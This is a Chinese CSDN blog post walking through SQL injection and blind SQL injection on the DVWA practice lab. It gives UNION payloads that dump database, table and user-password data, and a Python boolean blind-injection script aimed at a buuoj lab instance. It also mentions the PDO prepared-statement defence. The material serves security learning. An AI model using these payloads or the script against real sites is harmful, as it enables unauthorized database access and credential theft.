dvwa中sql注入与盲注

最新推荐文章于 2024-07-25 18:13:56 发布
最新推荐文章于 2024-07-25 18:13:56 发布
阅读量3.2k 收藏
点赞数
分类专栏: dvwa 文章标签: sql web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159634/article/details/121881130
版权

dvwa中sql注入与盲注

注入:

low:

payload:
查看字段数目

1' order by 2 #
1' order by 3 #

爆库

1' union select 1,database() #

爆表

1' union select 1,GROUP_CONCAT(TABLE_NAME) FROM information_schema.`TABLES` where TABLE_SCHEMA='dvwa' #

爆字段

1' union select 1,GROUP_CONCAT(COLUMN_NAME) FROM information_schema.`COLUMNS` where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'#

爆数据

1' union select user,password from users #

medium:

用bp抓包后很明显是数字注入:将’去了即可

high:

很明显他只会显示一组数据了,使用不存在数据的id再注入即可

impossible:(php中PDO技术,类似于java中的jdbc,先预编译,再传参)

$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );         
//预编译
$data->bindParam( ':id', $id, PDO::PARAM_INT );                           
//限定了传入参数的类型和传入的参数
$data->execute();                                                                 
//执行代码

盲注:

low:

  • 抄了大佬一个python脚本
import requests,re


#构建head头部
def get_header():
    print('imput url')
    url = 'http://f2dc4578-0d82-4f44-9728-7dab9ed3a25a.node4.buuoj.cn:81/vulnerabilities/sqli_blind/'          
    #获取ip,re.search查找字符串,group()即group(0)返回匹配正则表达式整体结果
    



    #构建header,其中如果要传参数进去则在前面加个f在参数部分再加个{}即可
    headers = {
        'Host' : 'f2dc4578-0d82-4f44-9728-7dab9ed3a25a.node4.buuoj.cn:81',
        'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0',
        'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language' : 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Connection' : 'close',
        'Referer' : 'http://f2dc4578-0d82-4f44-9728-7dab9ed3a25a.node4.buuoj.cn:81/vulnerabilities/sqli_blind/',
        'Cookie': 'UM_distinctid=17d95c1130a584-0dc5f2065052a48-4c3e217e-144000-17d95c1130b7dc;security=low; PHPSESSID=8mepl10iji29942ldjko3ljep7',
        'Upgrade-Insecure-Requests':'1'

    }

    return headers,url


#爆库的长度
def db_length(url,headers):
    for i in range(1,6):
        # 所有payload里的注释#要用url编码表示,因为这是直接添加在url里的
        dbLen_payload = '?id=1\' and length(database()) = '+str(i)+' %23&Submit=Submit';
        #注意这里是headers=headers
        r = requests.get(url+dbLen_payload,headers=headers).text
        if 'User ID exists in the database.' in r:
            dbLen = i
            break
        else:
            dbLen=0
    print('dbLen=',dbLen)
    return dbLen



#爆库名
def db_name(dbLen,url,headers):
    dbName=''
    for i in range(1,dbLen+1):
        #遍历ascii码
        for j in range(65,123):
            #注意:这里payload中第二个参数需要在sql语句中也加入单引号,以后写payload前,现在数据库中写好再往过加吧
            dbName_payload = '?id=1\' and substr(database(),'+str(i)+',1)=\''+str(chr(j))+'\' %23&Submit=Submit'
            r = requests.get(url+dbName_payload,headers=headers).text
            if 'User ID exists in the database.' in r:
                print(j)
                dbName = dbName + str(chr(j))
                break
    print(dbName)
    return dbName



#爆表总长度
#select 1  and (select length(GROUP_CONCAT(TABLE_NAME,'^')) = 29 FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) #
#注意:子查询一定要加(),因为没加()浪费了我一个小时
#注意:还有就是尽量能用数据库就用数据库,TABLE_SCHEMA=DATABASE(),如果用你查出来的库是不行的,我也不清楚为什么爆库的时候不分大小写,而爆表的时候就分大小写了。。我自己的数据库反正是不分大小写的
def tb_len(dbName,url,headers):
    for i in range(10,30):
        tbLen_payload = '?id=1\' and (select length(GROUP_CONCAT(TABLE_NAME,\'^\')) = '+str(i)+' FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE())     %23&Submit=Submit'
        r=requests.get(url+tbLen_payload,headers=headers).text
        if 'User ID exists in the database.' in r:
            tbLen = i
            break
        else:
            tbLen=-1
    print(tbLen)
    return tbLen


#爆表名
#select 1  and (select substr(GROUP_CONCAT(TABLE_NAME,'^'),i,1)='b'  FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) #
def tb_name(tbLen,url,headers):
    tbName=''
    for i in range(1,tbLen+1):
        for j in range(65,123):
            tbName_payload = '?id=1\' and (select substr(GROUP_CONCAT(TABLE_NAME,\'^\'),'+str(i)+',1)=\''+str(chr(j))+'\'  FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) %23&Submit=Submit'
            r = requests.get(url+tbName_payload,headers=headers).text
            
            if 'User ID exists in the database.' in r:
                
                tbName = tbName + str(chr(j))
                break
    print(tbName)
    return tbName
            



if __name__ == '__main__':
    headers,url = get_header()
    dbLen = db_length(url,headers)
    dbName = db_name(dbLen,url,headers)
    tbLen = tb_len(dbName,url,headers)
    tbName = tb_name(tbLen,url,headers)
  • 两位大佬blog:
    https://blog.csdn.net/qq_42785117/article/details/100310559
    https://blog.csdn.net/qq_42181428/article/details/88075784

medium

medium不会python脚本,主要是它不仅用了post,他传输文件用的还不是json,但是用bp抓包后可以直接暴力破解

high

high模式下,发现还是post,但他中途进行了跳转,bp第二个包的cookie是第一个包传的参数的url编码,所以我们直接使用bp暴力破解即可模式即可

暴力破解

暴力破解书写payload时一位一位爆破,不然会无限重复

impossible

和sql注入的impossible一样,都是采用了PDO技术,很安全

ookura risona
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
在这个实验,我们将深入理解SQL注入盲注类型,并学习如何使用sqlmap工具进行自动化探测和利用。 一、SQL注入-盲注 1. 盲注的基本原理是通过观察应用程序的响应时间或者返回结果的微妙变化来判断SQL查询的结果...
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
这个平台提供了多种类型的SQL注入场景,包括盲注、时间基注入、联合查询注入等,帮助用户深入理解SQL注入的工作原理和防范方法。 使用这些工具,初学者可以学习到Web应用程序安全的基础知识,而专业人士则可以提升...
DVWA通关之SQL Injection(Blind盲注
ZJLE的博客
08-06 126
DVWA通关之SQL Injection(Blind盲注)Low:Medium:High: 盲注就是在SQL注入过程,服务器并没有给客户端返回信息。通过盲注可以对程序对应的数据存储区进行对应的探测。盲注分类可以分为基于时间和基于布尔以及基于报错的盲注。 可以参考: https://www.jianshu.com/p/757626cec742 SQL盲注-测试思路: l 对于基于布尔的盲注, 理解:通过and、or等逻辑运算符让整个SQL语句的执行结果为true或false,观察true或false对应的服
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 1192
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 1185
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
DVWAsql注入——盲注
Williamanddog的博客
12-22 3068
DVWA盲注
DVWASQL注入盲注
天空之蓝的博客
11-17 2789
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWAsql注入-盲注SQL Injection (Blind)
qq_54537919的博客
06-25 1387
DVWAsql注入-盲注SQL Injection (Blind)
dvwaSQL注入&盲注
shannow_123的博客
06-05 3454
dvwaSQL注入sql注入手工注入思路low1.判断注入类型2.判断字段数3.确定显示的字段顺序4.获取当前数据库5.获取数据库的表名6.获取表的字段名7.下载数据mediumhighsql盲注lowmediumhigh sql注入 手工注入思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据...
poc练习-dvwa靶场sql注入盲注
qq_44248518的博客
02-24 306
dvwasql注入poc(Python)
DVWAsql注入盲注
qq_74806534的博客
02-12 468
盲注,与一般注入的区别在于,一般地注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5553
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
网络安全原理与应用:SQL盲注.pptx
05-16
与传统的SQL注入不同,盲注并不直接显示注入语句的执行结果,而是依赖于应用程序的响应时间或输出状态来推断信息。这使得攻击过程更加复杂,需要更多的技巧和耐心。 1. **基于布尔的盲注** 布尔盲注依赖于查询结果...
学习之sql注入漏洞网址的创建
06-06
3. 修改dvwa源码:找到与SQL注入相关的页面,如dvwa/vulnerabilities/sqli-literal/,修改其查询代码,增加易受攻击的点。 4. 验证注入:在浏览器输入修改后的URL,尝试输入SQL注入语句,观察是否能得到预期的结果...
SQL盲注medium.pdf
05-13
SQL盲注是一种类型的SQL注入攻击,攻击者可以通过构造特殊的输入来获取数据库的敏感信息,而不需要知道数据库的结构和表名。盲注攻击的难度较高,需要攻击者具备一定的技术水平和经验。 知识点:SQL盲注SQL注入...
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 423
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析的强大能力。
MySQL SQL 编程练习
最新发布
weixin_68398469的博客
07-25 478
【代码】MySQL SQL 编程练习。
数据库实验:SQL Server创建数据库及基本表
sherry__yuzu的博客
07-24 294
1、掌握使用SQL SERVER Management Studio工具连接数据库引擎;2、掌握使用CREATE TABLE 创建基本表的用法;3、掌握使用ALTER TABLE 修改基本表的用法;4、掌握使用DROP TABLE删除基本表的用法;
dvwa sql注入盲注
10-09
DVWA(Damn Vulnerable Web Application)进行盲注的过程也类似。下面是一个简单的示例: 假设我们有一个登录页面,我们可以通过输入用户名和密码来验证用户身份。在用户名字段,我们可以尝试输入一些恶意的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值